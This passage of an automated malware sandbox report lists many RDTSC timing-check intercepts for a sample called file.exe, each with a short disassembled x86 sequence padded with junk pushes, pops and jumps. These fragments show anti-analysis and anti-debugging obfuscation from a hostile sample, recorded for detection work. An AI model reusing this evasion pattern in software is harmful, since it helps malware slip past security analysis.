                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092DBC second address: 1092DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C1502123h 0x00000009 jnc 00007F05C1502116h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092DD9 second address: 1092DFA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05C12920B6h 0x00000008 jne 00007F05C12920B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F05C12920BAh 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092DFA second address: 1092DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092F63 second address: 1092F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092F6E second address: 1092F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10930F3 second address: 1093102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jng 00007F05C12920B6h 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933B2 second address: 10933B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933B8 second address: 10933BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933BE second address: 10933E1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F05C1502116h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F05C150211Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933E1 second address: 10933E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933E5 second address: 10933E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933E9 second address: 10933EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933EF second address: 10933F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933F9 second address: 10933FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10939BC second address: 10939C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10939C0 second address: 10939C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10982BB second address: 10982BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A135 second address: 109A139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A139 second address: 109A174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 jp 00007F05C1502116h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push ecx 0x0000001a jmp 00007F05C150211Ch 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 js 00007F05C1502116h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D3E1 second address: 109D3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F05C12920B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D3EF second address: 109D3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D3F9 second address: 109D3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CC75 second address: 109CC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F05C150211Ah 0x0000000c jc 00007F05C150211Eh 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CC90 second address: 109CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F05C12920C5h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CCAB second address: 109CCF9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F05C1502116h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jnc 00007F05C1502118h 0x00000014 pushad 0x00000015 jmp 00007F05C1502128h 0x0000001a jmp 00007F05C1502123h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jnl 00007F05C1502116h 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2374 second address: 10A237A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A237A second address: 10A2380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24BE second address: 10A24CC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24CC second address: 10A24D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24D2 second address: 10A24EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2650 second address: 10A2663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F05C150211Ah 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2663 second address: 10A2668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A27E4 second address: 10A27E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A27E8 second address: 10A27F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055AC8 second address: 1055ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055ACC second address: 1055B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov dh, 27h 0x0000000a or dx, 3F71h 0x0000000f mov ebx, dword ptr [ebp+12489BC5h] 0x00000015 mov edx, edi 0x00000017 add eax, ebx 0x00000019 jng 00007F05C12920BCh 0x0000001f mov dword ptr [ebp+122D2E19h], eax 0x00000025 mov dx, di 0x00000028 nop 0x00000029 js 00007F05C12920C9h 0x0000002f jmp 00007F05C12920C3h 0x00000034 push eax 0x00000035 jo 00007F05C12920BEh 0x0000003b jnl 00007F05C12920B8h 0x00000041 nop 0x00000042 js 00007F05C12920BEh 0x00000048 jg 00007F05C12920B8h 0x0000004e push 00000004h 0x00000050 mov di, bx 0x00000053 nop 0x00000054 pushad 0x00000055 pushad 0x00000056 push ebx 0x00000057 pop ebx 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F05C12920BDh 0x00000062 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055B48 second address: 1055B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2A7A second address: 10A2A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05C12920BCh 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A66CF second address: 10A66D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A66D5 second address: 10A66D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A66D9 second address: 10A66E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6ADD second address: 10A6AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F05C12920B6h 0x0000000e pop edi 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6F3C second address: 10A6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F05C1502131h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6F62 second address: 10A6FA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C0h 0x00000007 push ecx 0x00000008 jmp 00007F05C12920BAh 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05C12920BFh 0x00000017 jmp 00007F05C12920C2h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FA5 second address: 10A6FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FAB second address: 10A6FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FAF second address: 10A6FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F05C1502116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F05C1502116h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FC5 second address: 10A6FCF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05C12920B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA555 second address: 10AA55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AAB54 second address: 10AAB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AAB58 second address: 10AAB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AAB5E second address: 10AAB7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C12920C9h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2E01 second address: 10B2E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F05C1502116h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10057A5 second address: 10057AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0FC1 second address: 10B0FC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0FC7 second address: 10B101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F05C12920C7h 0x0000000b push edx 0x0000000c jmp 00007F05C12920BEh 0x00000011 pop edx 0x00000012 jo 00007F05C12920BCh 0x00000018 jns 00007F05C12920B6h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 jmp 00007F05C12920C5h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1BC3 second address: 10B1BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1BC7 second address: 10B1BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C8h 0x00000007 jmp 00007F05C12920C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1F07 second address: 10B1F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1F0C second address: 10B1F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C12920C4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c js 00007F05C12920C2h 0x00000012 js 00007F05C12920B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2188 second address: 10B21A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C1502128h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B21A6 second address: 10B21AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B21AF second address: 10B21B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B21B5 second address: 10B21D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F05C12920B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05C12920C5h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B24AF second address: 10B24C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F05C150211Ch 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B27BC second address: 10B27C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B27C2 second address: 10B27E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jg 00007F05C150211Eh 0x0000000d jc 00007F05C1502116h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 ja 00007F05C1502116h 0x0000001e popad 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B27E4 second address: 10B2813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C12920BBh 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F05C12920C8h 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2B4D second address: 10B2B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05C150211Ah 0x00000008 jp 00007F05C1502116h 0x0000000e jmp 00007F05C150211Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5C58 second address: 10B5C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F05C12920BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5C7C second address: 10B5C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5C82 second address: 10B5C96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F05C12920B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5C96 second address: 10B5C9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5C9C second address: 10B5CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F05C12920BBh 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B60B8 second address: 10B60C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F05C1502116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B60C7 second address: 10B60CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B60CB second address: 10B60CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B60CF second address: 10B60D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B60D5 second address: 10B60ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05C150211Eh 0x00000008 jo 00007F05C1502116h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F05C1502116h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6518 second address: 10B651C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C28BC second address: 10C28C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F05C1502122h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C28C9 second address: 10C28CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CBE second address: 10C2CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1F07 second address: 10C1F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D637A second address: 10D637E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D637E second address: 10D6397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F05C12920B8h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007F05C12920BEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6397 second address: 10D63A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F05C1502116h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D63A5 second address: 10D63AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBAC4 second address: 10DBACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED936 second address: 10ED956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F05C12920C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED779 second address: 10ED7A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502125h 0x00000007 jmp 00007F05C150211Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED7A4 second address: 10ED7B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F05C12920BAh 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED7B8 second address: 10ED7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F05C1502116h 0x00000009 jg 00007F05C1502116h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
